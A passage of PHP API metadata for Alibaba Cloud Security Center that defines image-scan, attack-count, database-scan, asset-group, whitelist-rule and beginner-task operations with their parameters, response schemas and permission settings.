=> 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'RegistryTypes', 'in' => 'query', 'schema' => ['description' => 'The type of the image repository. Separate multiple types with commas (,). Valid values:'."\n" ."\n" .'* **acr**'."\n" .'* **harbor**'."\n" .'* **quay**'."\n", 'type' => 'string', 'required' => false, 'example' => 'acr', 'title' => ''], ], [ 'name' => 'RegionIds', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the Container Registry instance in which the image repository is created. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], ], [ 'name' => 'RepoNamespaces', 'in' => 'query', 'schema' => ['description' => 'The namespace to which the image repository belongs. Separate multiple namespaces with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'hanghai-namespace', 'title' => ''], ], [ 'name' => 'RepoIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'crr-vridcl4****', 'title' => ''], ], [ 'name' => 'RepoNames', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository. Separate multiple names with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'centos', 'title' => ''], ], [ 'name' => 'Digests', 'in' => 'query', 'schema' => ['description' => 'The SHA-256 value of the image digest. Separate multiple SHA-256 values with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '6a5e103187b31a94592a47a5858617f7****', 'title' => ''], ], [ 'name' => 'Tags', 'in' => 'query', 'schema' => ['description' => 'The tag that is added to the image. Separate multiple tags with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '0.2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F9353221-40F4-5F98-B73C-2803DC804033'], 'Data' => [ 'description' => 'The data returned if the call is successful.'."\n", 'type' => 'object', 'properties' => [ 'ScanImageCount' => ['description' => 'The quota for container image scan to be consumed by the task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NeedAuthCount' => ['description' => 'The number of images to scan in the task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"F9353221-40F4-5F98-B73C-2803DC804033\\",\\n \\"Data\\": {\\n \\"ScanImageCount\\": 3,\\n \\"NeedAuthCount\\": 6\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n F9353221-40F4-5F98-B73C-2803DC804033\\n \\n 3\\n 6\\n \\n","errorExample":""}]', 'title' => 'PublicPreCheckImageScanTask', 'description' => 'You can call the PublicPreCheckImageScanTask operation to estimate the quota for container image scan to be consumed by the task. This ensures that you know the quota to be consumed before you perform the task. If the remaining quota for container image scan is less than the quota to be consumed by the task, you must purchase a sufficient quota. This prevents the task from being stopped due to an insufficient quota.'."\n" ."\n" .'If you do not specify the optional parameters when you call this operation, the total number of protected images and the quota for container image scan to be consumed by scanning all the protected images are queried. If you specify the optional parameters, the number of images that meet the specified conditions and the quota for container image scan to be consumed by scanning the images are queried.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PublicPreCheckImageScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:PublicPreCheckImageScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'PublicSyncAndCreateImageScanTask' => [ 'summary' => 'Adds images to Security Center and creates an image scan task to scan the images.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.X.X', 'title' => ''], ], [ 'name' => 'Images', 'in' => 'query', 'schema' => ['description' => 'The information about the images. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **RegistryType**: the type of the image repository. Valid values:'."\n" ."\n" .' * acr'."\n" .' * harbor'."\n" .' * quay'."\n" ."\n" .'* **RepoId**: the ID of the image repository.'."\n" ."\n" .'* **InstanceId**: the ID of the Container Registry instance to which the image repository belongs.'."\n" ."\n" .'* **RepoNamespace**: the namespace to which the image repository belongs.'."\n" ."\n" .'* **RegionId**: the region ID of the image.'."\n" ."\n" .'* **RepoName**: the name of the image repository.'."\n" ."\n" .'* **Digest**: the digest of the image.'."\n" ."\n" .'* **Tag**: the tag that is added to the image.'."\n" ."\n" .'* **CreateTime**: the timestamp when the image was created. Unit: milliseconds.'."\n" ."\n" .'* **UpdateTime**: the timestamp when the image was updated. Unit: milliseconds.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{"registryType":"acr","repoId":"crr-red9kgqqi0fh75d5","instanceId":"cri-1x2qtjd75ofqvfa8","repoNamespace":"1125","regionId":"cn-hangzhou","repoName":"script1","digest":"b1064a5007786b6f82a50772858e8156bc1e5fbddb7dd20af6922761ad197fe4","tag":"v0113-ver2","createTime":1641267666666,"updateTime":1641267909090}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F9353221-40F4-5F98-B73C-2803DC804033'], 'Data' => [ 'description' => 'The data returned if the call is successful.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the image scan task.'."\n", 'type' => 'string', 'example' => 'a410bb3e68c217a3368bc0238c66886d', 'title' => ''], 'TotalCount' => ['description' => 'The total number of images to scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'FinishCount' => ['description' => 'The number of images that have been scanned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'CollectTime' => ['description' => 'The timestamp when the image information was collected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150', 'title' => ''], 'ExecTime' => ['description' => 'The timestamp when the image scan task started to run. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150', 'title' => ''], 'Status' => ['description' => 'The status of the image scan task. Valid values:'."\n" ."\n" .'* **INIT**: The task is being initialized.'."\n" .'* **PRE_ANALYZER**: The task is being pre-processed.'."\n" .'* **SUCCESS**: The task is successful.'."\n" .'* **FAIL**: The task failed.'."\n", 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Progress' => ['description' => 'The progress of the image scan task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Result' => ['description' => 'The result of the image scan task. Valid values:'."\n" ."\n" .'* **SUCCESS**: The task is successful.'."\n" .'* **TASK\\_NOT\\_SUPPORT_REGION**: The image is deployed in a region that is not supported by container image scan.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'CanCreate' => ['description' => 'Indicates whether you can create more image scan tasks. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n" ."\n" .'> By default, a maximum of 10 image scan tasks can be running at the same time. If 10 image scan tasks are running, you cannot create an image scan task by calling this operation. You must wait for at least one of the 10 existing image scan tasks to complete before you can create an image scan task.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"F9353221-40F4-5F98-B73C-2803DC804033\\",\\n \\"Data\\": {\\n \\"TaskId\\": \\"a410bb3e68c217a3368bc0238c66886d\\",\\n \\"TotalCount\\": 5,\\n \\"FinishCount\\": 5,\\n \\"CollectTime\\": 1644286364150,\\n \\"ExecTime\\": 1644286364150,\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Progress\\": 100,\\n \\"Result\\": \\"SUCCESS\\",\\n \\"CanCreate\\": true\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n F9353221-40F4-5F98-B73C-2803DC804033\\n \\n a410bb3e68c217a3368bc0238c66886d\\n 5\\n 5\\n 1644286364150\\n 1644286364150\\n SUCCESS\\n 100\\n SUCCESS\\n true\\n \\n","errorExample":""}]', 'title' => 'PublicSyncAndCreateImageScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:PublicSyncAndCreateImageScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'QueryAttackCount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'From', 'in' => 'formData', 'schema' => ['description' => 'The source identifier of the request. Set this parameter to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '175.0.XX.XX', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server. Separate multiple UUIDs with commas (,).'."\n" .'> Call the [DescribeCloudCenterInstances](~~141932~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '1587bedb-fdb4-48c4-9330-************', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The security alert count information.', 'type' => 'array', 'items' => [ 'description' => 'The security alert count information.', 'type' => 'object', 'properties' => [ 'TacticId' => ['description' => 'The ATT&CK attack phase ID.', 'type' => 'string', 'example' => 'TA0043', 'title' => ''], 'TacticType' => ['description' => 'The ATT&CK attack phase type name.', 'type' => 'string', 'example' => '数据收集', 'title' => ''], 'EventCount' => ['description' => 'The number of security alert occurrences.', 'type' => 'integer', 'format' => 'int32', 'example' => '28', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Success' => ['description' => 'The result status of the exception event processing. Valid values:'."\n" ."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D4BE7D77-5B02-5126-A684-A73F6CD3XXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security alert counts by attack phase', 'summary' => 'Queries the number of security alert events that occurred in each attack phase.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryAttackCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryAttackCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"TacticId\\": \\"TA0043\\",\\n \\"TacticType\\": \\"数据收集\\",\\n \\"EventCount\\": 28\\n }\\n ],\\n \\"Count\\": 0,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"D4BE7D77-5B02-5126-A684-A73F6CD3XXXX\\"\\n}","type":"json"}]', ], 'QueryDiscoverDatabase' => [ 'summary' => 'Queries the progress of a database scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CreateMark', 'in' => 'query', 'schema' => ['description' => 'The ID of the scan task.'."\n" ."\n" .'> You can call the [StartDiscoverDatabaseTask](~~StartDiscoverDatabaseTask~~) operation to query the ID of the task.'."\n", 'type' => 'string', 'required' => false, 'example' => '7f7b051f-7d1c-46da-b253-a03f3a27****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TaskProgress' => ['description' => 'The progress of the database scan task in percentage.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '90', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TaskProgress\\": 90,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92****\\"\\n}","type":"json"}]', 'title' => 'QueryDiscoverDatabase', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryDiscoverDatabase'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryDiscoverDatabase', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'QueryGroupIdByGroupName' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '10.12.XX.XX', 'title' => ''], ], [ 'name' => 'GroupName', 'in' => 'query', 'schema' => ['description' => 'The name of the group to query.', 'type' => 'string', 'required' => true, 'example' => 'TestGroupName', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'GroupId' => ['description' => 'The ID of the group.', 'type' => 'integer', 'format' => 'int64', 'example' => '9935302', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset group ID', 'summary' => 'Queries the ID of an asset group by group name.', 'description' => 'Queries the ID of an asset group by the group name. If you need to specify an asset group ID when you call other operations such as [GetSuspiciousStatistics](~~GetSuspiciousStatistics~~) and [DeleteGroup](~~DeleteGroup~~), you can call this operation to obtain the asset group ID.'."\n" ."\n" .'### QPS limit'."\n" .'The queries per second (QPS) limit for a single user for this operation is 10 calls per second. If the limit is exceeded, API calls are throttled. This may affect your business. Call this operation appropriately.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGroupIdByGroupName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryGroupIdByGroupName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"GroupId\\": 9935302\\n}","type":"json"}]', ], 'QueryGroupedSecurityEventMarkMissList' => [ 'summary' => 'Queries whitelist rules.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'EventName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The name of the alert event. The value indicates a subtype.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Login with unusual location'], ], [ 'name' => 'Remark', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The condition that is used to query alert events by asset. You can specify a value of the following types:'."\n" ."\n" .'* The IP address of the asset.'."\n" .'* The public IP address of the asset.'."\n" .'* The private IP address of the asset.'."\n" .'* The name of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '222.185.XX.XX'], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'formData', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'formData', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'From', 'in' => 'formData', 'schema' => ['description' => 'The ID of the request source. Set the value to sas.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '113.66.XX.XX', 'title' => ''], ], [ 'name' => 'DisposalWay', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The handling method. Valid values:'."\n" ."\n" .'* **1**: Automatically Added to Whitelist'."\n" .'* **2**: Defense Without Notification'."\n", 'type' => 'string', 'required' => false, 'example' => '1'], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'An array that consists of the whitelist rules.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'AliUid' => ['title' => '', 'description' => 'The ID of the user.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '31412647'], 'EventType' => ['title' => '', 'description' => 'The subtype of the alert event.'."\n", 'type' => 'string', 'example' => 'Unusual Logon'], 'EventTypeOriginal' => ['title' => '', 'description' => 'The type of the alert event.'."\n", 'type' => 'string', 'example' => '异常登录'], 'EventName' => ['title' => '', 'description' => 'The name of the alert event. The value indicates a subtype.'."\n", 'type' => 'string', 'example' => 'Login with unusual location'], 'EventNameOriginal' => ['title' => '', 'description' => 'The name of the alert event. The value indicates a type.'."\n", 'type' => 'string', 'example' => 'login_common_location'], 'Uuids' => ['title' => '', 'description' => 'The UUIDs of assets. Multiple UUIDs are separated by commas (,).'."\n", 'type' => 'string', 'example' => '6985b88c-eb19-4d27-98ad-e4a42312****,5721d503-9b04-4243-89ca-1fb8ca5e****,db2678c3-10e3-4a20-92f1-265f6****'], 'Field' => ['title' => '', 'description' => 'The field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'type'], 'FiledAliasName' => ['title' => '', 'description' => 'The alias of the field.'."\n", 'type' => 'string', 'example' => 'Logon Time'], 'FieldValue' => ['title' => '', 'description' => 'The value of the field.'."\n", 'type' => 'string', 'example' => 'root'], 'Operate' => ['title' => '', 'description' => 'The operator. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n" .'* **regex**: regular expression'."\n", 'type' => 'string', 'example' => 'contains'], 'DisposalWay' => ['title' => '', 'description' => 'The handling method. Valid values:'."\n" ."\n" .'* **auto\\_add_white**: Automatically Added to Whitelist'."\n" .'* **defense\\_not_notification**: Defense Without Notification'."\n", 'type' => 'string', 'example' => 'auto_add_white'], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request is successful. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request is successful. Other status codes indicate that the request fails. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'There was an error with your request.', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '965F9282-D403-4FA2-B1B9-10F62DC719BF', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"AliUid\\": 31412647,\\n \\"EventType\\": \\"Unusual Logon\\",\\n \\"EventTypeOriginal\\": \\"异常登录\\",\\n \\"EventName\\": \\"Login with unusual location\\",\\n \\"EventNameOriginal\\": \\"login_common_location\\",\\n \\"Uuids\\": \\"6985b88c-eb19-4d27-98ad-e4a42312****,5721d503-9b04-4243-89ca-1fb8ca5e****,db2678c3-10e3-4a20-92f1-265f6****\\",\\n \\"Field\\": \\"type\\",\\n \\"FiledAliasName\\": \\"Logon Time\\",\\n \\"FieldValue\\": \\"root\\",\\n \\"Operate\\": \\"contains\\",\\n \\"DisposalWay\\": \\"auto_add_white\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 9\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"There was an error with your request.\\",\\n \\"RequestId\\": \\"965F9282-D403-4FA2-B1B9-10F62DC719BF\\"\\n}","type":"json"}]', 'title' => 'QueryGroupedSecurityEventMarkMissList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGroupedSecurityEventMarkMissList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryGroupedSecurityEventMarkMissList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'QueryGuidTaskList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447D****', 'title' => ''], 'GuideTaskConfigList' => [ 'description' => 'The list of beginner task information.', 'type' => 'array', 'items' => [ 'description' => 'The beginner task information.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The task status. Valid values:'."\n" .'- **0**: Closed.'."\n" .'- **1**: In progress.'."\n" .'- **2**: Completed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TaskTypeName' => ['description' => 'The node name. Valid values:'."\n" ."\n" .'- **guid_task_security_score_promote_video**: the node of watching the beginner quick start video'."\n" .'- **guide_sub_task_config_defence_hbr**: the anti-ransomware configuration node for servers'."\n" .'- **guide_sub_task_config_uni_defence_hbr**: the anti-ransomware configuration node for databases'."\n" .'- **guid_task_log_analysis_config**: the log analysis node'."\n" .'- **guide_sub_task_web_lock_config**: the web tamper-proofing node'."\n" .'- **guide_sub_task_config_anti_crack**: the anti-brute-force attacks node'."\n" .'- **guid_task_container_security_video**: the container security video node'."\n" .'- **guid_task_container_image_scan_config**: the container image scan node'."\n" .'- **guid_task_k8s_log_analysis_config**: the Kubernetes threat detection node'."\n" .'- **guid_task_container_network**: the container visualization node'."\n" .'- **guide_sub_task_config_add_collection**: the node of adding the console to favorites'."\n" .'- **guide_sub_task_vul_scan**: the vulnerability scanning node'."\n" .'- **guide_sub_task_virusKill**: the virus scan node.', 'type' => 'string', 'example' => 'guide_sub_task_config_add_collection', 'title' => ''], 'TaskId' => ['description' => 'The task ID.', 'type' => 'integer', 'format' => 'int32', 'example' => 't-000d8slfgx4p40kb64ad', 'title' => ''], 'RewardData' => [ 'description' => 'The reward information for task completion.', 'type' => 'object', 'properties' => [ 'Reward' => ['description' => 'The reward name. Valid values:'."\n" .'- **addTrialDay**: trial days reward'."\n" .'- **addAntiRansomwareCapacity**: anti-ransomware capacity reward'."\n" .'- **addImageScanAuthCount**: image scan authorization quota reward'."\n" .'- **addWebLockAuthCount**: web tamper-proofing authorization quota reward'."\n" .'- **addSlsCapacity**: log analysis storage capacity reward.', 'type' => 'string', 'example' => 'addAntiRansomwareCapacity', 'title' => ''], 'RewardConfig' => ['description' => 'The reward configuration information. This parameter is in JSON format.'."\n" .'> The key in the JSON object indicates the reward content, and the value indicates the reward amount. Valid values of the key:'."\n" .'- **webLockAuthCount**: the web tamper-proofing authorization quota'."\n" .'- **ransomwareCapacity**: the anti-ransomware capacity, in GB'."\n" .'- **slsCapacity**: the log analysis capacity, in GB'."\n" .'- **days**: the number of usage 